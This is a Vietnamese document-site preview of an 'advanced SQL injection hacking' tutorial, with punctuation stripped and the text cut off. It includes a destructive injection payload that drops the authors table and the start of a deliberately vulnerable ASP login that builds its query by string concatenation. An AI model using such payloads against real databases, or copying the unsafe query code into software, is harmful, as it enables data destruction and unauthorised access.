TAILIEUCHUNG - Hack Sql Inject nâng cao

Các bạn thử xem một câu truy vấn SQL: select id, forename, surname from authors thì 'id','forename' và 'surname' là column của table author,khi câu truy vấn trên làm việc thì nó sẽ cho kết quả tất cã các dòng trong table câu truy vấn sau: select id, forename, surname from authors where forename = 'john' and surname = 'smith' Đây là câu truy vấn có điều kiện chắc không nói các bạn cũng biết,nó cho ra kết quả tất cã những ai trong csdl với forename = 'john' and surname = 'smith' Vì vậy khi vào giá trị. | Hack Sql Inject nâng cao Các bạn thử xem một câu truy vấn SQL select id forename surname from authors thì id forename và surname là column của table author khi câu truy vấn trên làm việc thì nó sẽ cho kết quả tất cã các dòng trong table câu truy vấn sau select id forename surname from authors where forename john and surname smith Đây là câu truy vấn có điều kiện chắc không nói các bạn cũng biết nó cho ra kết quả tất cã những ai trong csdl với forename john and surname smith Vì vậy khi vào giá trị đầu vào không đúng như trong csdl liệu Forename jo hn Surname smith Câu truy vấn trở thành select id forename surname from authors where forename jo hn and surname smith Câu truy vấn trên khi được xử lý thì nó sẽ phát sinh lổi Server Msg 170 Level 15 State 1 Line 1 Line 1 Incorrect syntax near hn . Lý do là ta lồng vào dấu nháy giá trị vào trở thành hn sai so với csdl vậy sẽ phát sinh lổi lợi dụng cái này attacker có thể xoá dữ liệu của bạn như sau Forename jo drop table authors-- Table author sẽ bị xóa nguy hiểm phải không Nhìn vào đoạn code asp sau đây là một form login HTML HEAD TITLE Login Page TITLE HEAD BODY bgcolor 000000 text cccccc FONT Face tahoma color cccccc CENTER H1 Login H1 FORM action method post TABLE TR TD Username TD TD INPUT type text name username size 100 Page 4 width 100 INPUT TD TR TR TD Password TD TD INPUT type password name password size 100 width 100 INPUT TD TR TABLE INPUT type submit value Submit INPUT type reset value Reset FORM FONT BODY HTML Đây là code HTML BODY bgcolor 000000 text ffffff FONT Face tahoma color ffffff STYLE p font-size 20pt important font font-size 20pt important h1 font-size 64pt important STYLE @LANGUAGE JScript function trace str if debug true str function Login cn var username var password username username password password var rso var sql select from users where username .

TỪ KHÓA LIÊN QUAN
TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.